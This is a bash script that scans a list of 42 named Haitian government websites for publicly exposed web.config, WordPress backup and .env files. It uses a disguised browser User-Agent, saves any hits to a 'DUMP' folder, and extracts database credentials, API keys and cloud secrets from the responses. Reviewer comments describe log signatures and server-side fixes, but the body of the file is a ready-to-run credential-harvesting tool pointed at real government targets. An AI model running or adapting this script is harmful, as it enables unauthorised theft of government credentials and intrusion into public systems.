#!/bin/bash
# Haiti .gouv.ht web.config / sensitive file exposure scanner
# Date: 2026-03-04

# Directory that receives saved response bodies. Nothing in this file creates
# it, so the `>` redirects further down depend on it already existing.
# NOTE(review): the Windows-style path suggests Git Bash/MSYS or similar — confirm.
OUTDIR="C:/Users/Squir/Desktop/HAITI/DUMP/WEBCONFIG-SCAN"
# Fixed desktop-Chrome User-Agent sent on every request. The traffic therefore
# does not identify itself as automated; when reviewing access logs, every
# request from one run carries this exact string.
UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"

# Hostnames probed, in list order. Each one is combined with every entry in
# PATHS below.
DOMAINS=(
  primature.gouv.ht
  mae.gouv.ht
  mef.gouv.ht
  mjsp.gouv.ht
  menfp.gouv.ht
  mspp.gouv.ht
  agriculture.gouv.ht
  mci.gouv.ht
  mtptc.gouv.ht
  mpce.gouv.ht
  mast.gouv.ht
  mde.gouv.ht
  mcc.gouv.ht
  tourisme.gouv.ht
  mjsac.gouv.ht
  mcfdf.gouv.ht
  mhave.gouv.ht
  md.gouv.ht
  dgi.gouv.ht
  douane.gouv.ht
  oni.gouv.ht
  cscca.gouv.ht
  ulcc.gouv.ht
  ucref.gouv.ht
  cnmp.gouv.ht
  conatel.gouv.ht
  dinepa.gouv.ht
  ofatma.gouv.ht
  ofnac.gouv.ht
  communication.gouv.ht
  budget.gouv.ht
  bmpad.gouv.ht
  anarse.gouv.ht
  bme.gouv.ht
  igf.gouv.ht
  omrh.gouv.ht
  faes.gouv.ht
  infp.gouv.ht
  ute.gouv.ht
  deliveryunit.gouv.ht
  securitepublique.gouv.ht
  sigrh.gouv.ht
)

# Paths requested on every host: an ASP.NET/IIS configuration file, a backup
# copy of a WordPress configuration file, and a dotenv file. All three hold
# deployment secrets and should never be served by a web server. Server-side
# mitigation is to keep such files out of the document root and to deny
# dotfiles and backup extensions (.bak and similar) in the server config.
PATHS=(
  "/web.config"
  "/wp-config.php.bak"
  "/.env"
)

# Main run: for every host in DOMAINS and every path in PATHS, issue a GET over
# https and then, in some cases, http; classify the response by keyword; save
# and print anything that looks like an exposed configuration file.
#
# What this looks like from the server side: at most six sequential GET
# requests per host (three paths, two schemes), all with the same User-Agent
# string, for /web.config, /wp-config.php.bak and /.env. Requests for these
# three paths from one client in close succession are a usable log signature.
echo "=== Haiti .gouv.ht Sensitive File Exposure Scan ==="
echo "=== Started: $(date) ==="
echo ""

for domain in "${DOMAINS[@]}"; do
  echo "----------------------------------------------"
  echo "[SCANNING] $domain"
  echo "----------------------------------------------"

  for path in "${PATHS[@]}"; do
    for proto in https http; do
      url="${proto}://${domain}${path}"
      # Output name is <domain> followed by the path with every '/' turned into
      # '-' (e.g. "<domain>-web.config"). $path is unquoted in the echo; that
      # is harmless for the three fixed PATHS values.
      outfile="${OUTDIR}/${domain}$(echo $path | tr '/' '-')"

      echo -n "  [${proto}] ${path} ... "

      # -s: no progress output; -L: follow redirects, so the status captured
      # below belongs to the final response, not the first hop. -w appends a
      # marker line carrying the status code after the body. curl's stderr is
      # discarded, so transport errors are not shown.
      response=$(curl -sL \
        --connect-timeout 10 \
        --max-time 20 \
        -H "User-Agent: ${UA}" \
        -w "\n---HTTP_CODE:%{http_code}---" \
        "${url}" 2>/dev/null)

      # Split the status marker from the body. The sed pattern is anchored at
      # end of line, so it only strips a marker that ends a line.
      http_code=$(echo "$response" | grep -o 'HTTP_CODE:[0-9]*' | cut -d: -f2)
      body=$(echo "$response" | sed 's/---HTTP_CODE:[0-9]*---$//')

      # An empty code means no marker was found in curl's output; move on to
      # the next scheme.
      if [ -z "$http_code" ]; then
        echo "TIMEOUT/UNREACHABLE"
        continue
      fi

      echo -n "HTTP $http_code "

      # Check for interesting content.
      # All three keyword checks run on every response regardless of which
      # path was requested and regardless of the status code, so one body can
      # print more than one banner. The match is case-insensitive and purely
      # on keywords: a page that merely mentions these tokens (documentation,
      # an error page echoing them, a login form) is labelled "VULNERABLE" as
      # well, so each hit needs manual confirmation.
      is_interesting=0

      # web.config checks (XML element names and the connectionString
      # attribute; the '.' in "system.web" is a regex wildcard here)
      if echo "$body" | grep -qi "connectionString\|<configuration\|<appSettings\|<system.web"; then
        is_interesting=1
        echo "*** VULNERABLE - XML CONFIG EXPOSED ***"
      fi

      # wp-config checks (WordPress database constants and $table_prefix)
      if echo "$body" | grep -qi "DB_NAME\|DB_USER\|DB_PASSWORD\|DB_HOST\|table_prefix"; then
        is_interesting=1
        echo "*** VULNERABLE - WP CONFIG EXPOSED ***"
      fi

      # .env checks (DB_PASSWORD overlaps with the wp-config check above, so a
      # body containing it triggers both banners)
      if echo "$body" | grep -qi "DB_PASSWORD\|APP_KEY\|DB_DATABASE\|MAIL_PASSWORD\|AWS_SECRET\|API_KEY"; then
        is_interesting=1
        echo "*** VULNERABLE - ENV FILE EXPOSED ***"
      fi

      if [ "$is_interesting" -eq 1 ]; then
        # The complete response body is written to disk unencrypted. A genuine
        # hit means this file, and the terminal output below, contain live
        # secrets; for the owner of the affected site the remedy is to remove
        # the file from the web root and rotate every credential in it.
        echo "$body" > "${outfile}"
        echo "  --> SAVED: ${outfile}"

        # Extract credentials
        echo "  [CREDS FOUND]:"
        # Connection strings: prints each key=value fragment up to the next
        # ';'. `read` without -r interprets backslashes and trims surrounding
        # whitespace, so printed values can differ from the saved file.
        echo "$body" | grep -oi 'server=[^;]*\|data source=[^;]*\|database=[^;]*\|initial catalog=[^;]*\|uid=[^;]*\|user id=[^;]*\|pwd=[^;]*\|password=[^;]*' | while read line; do
          echo "    $line"
        done
        # WP/ENV style: prints whole matching lines, capped at the first 20.
        echo "$body" | grep -i 'DB_NAME\|DB_USER\|DB_PASSWORD\|DB_HOST\|APP_KEY\|API_KEY\|MAIL_PASSWORD\|AWS_SECRET' | head -20 | while read line; do
          echo "    $line"
        done

        # If we got a hit on HTTPS, skip HTTP for this path
        if [ "$proto" = "https" ]; then
          break
        fi
      else
        # No keyword hit: describe the response by status code and size.
        # ${#body} counts characters, although the messages say "bytes".
        bodylen=${#body}
        if [ "$http_code" = "200" ] && [ "$bodylen" -gt 100 ]; then
          # Only the first five lines are inspected for an HTML marker.
          if echo "$body" | head -5 | grep -qi "<!DOCTYPE\|<html"; then
            echo "HTML page (likely error/default page)"
          else
            echo "200 but content unclear (${bodylen} bytes)"
            # Save for manual review if small enough and not obviously HTML
            if [ "$bodylen" -lt 5000 ]; then
              echo "$body" > "${outfile}.review"
              echo "  --> Saved for review: ${outfile}.review"
            fi
          fi
        elif [ "$http_code" = "403" ]; then
          echo "FORBIDDEN"
        elif [ "$http_code" = "404" ]; then
          echo "NOT FOUND"
        # NOTE(review): curl runs with -L, so a 301/302 should normally have
        # been followed before the status is recorded — confirm when this
        # branch can be reached.
        elif [ "$http_code" = "301" ] || [ "$http_code" = "302" ]; then
          echo "REDIRECT"
        elif [ "$http_code" = "500" ]; then
          echo "SERVER ERROR"
        else
          echo "(${bodylen} bytes)"
        fi

        # If HTTPS worked (even 404/403), skip HTTP.
        # The -n test is always true at this point: the empty-code case
        # already hit `continue` above.
        if [ "$proto" = "https" ] && [ -n "$http_code" ]; then
          break
        fi
      fi

    done
  done
  echo ""
done

echo "=== Scan Complete: $(date) ==="
